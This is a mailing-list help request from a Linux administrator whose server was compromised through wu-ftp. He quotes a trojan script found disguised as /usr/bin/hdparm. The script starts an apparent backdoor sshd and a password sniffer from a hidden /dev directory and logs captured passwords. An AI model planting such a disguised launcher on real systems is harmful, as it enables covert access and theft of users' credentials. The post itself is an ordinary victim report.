Hello -
I was the victim of a cracker who exploited wu-ftp 2.6.0
I've since upgraded to 2.6.2, and disabled or removed almost
all of the hidden programs he left behind, but I accidently
found another one. The problem is I cannot rm it.
I use Linux 2.2.16 and bash.
I wanted to update my hdparm file from 3.9 to 4.6 so I did
a 'locate hdparm' and found I had a copy in both /usr/bin
and /usr/sbin. Curious, I did 'which hdparm' and found it
was the one in /usr/sbin. So what was the other one?
It turned out to be a perl script to call the hacker's
sniffer. I tried to move it. I tried to edit it with vi.
The permissions were 500, so I tried to chmod 700. I tried
to rm it. Nothing. I get this message:
"Cannot unlink hdparm: Operation not permitted."
Can you tell me how to get rid of this offensive piece of
garbage? BTW, this is the contents of the file:
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
I found that tcp.log contained plain text passwords of every user
on my system. scarey!
-Roy Wilson-
[EMAIL PROTECTED]
_______________________________________________
Bug-fileutils mailing list
[EMAIL PROTECTED]
http://mail.gnu.org/mailman/listinfo/bug-fileutils
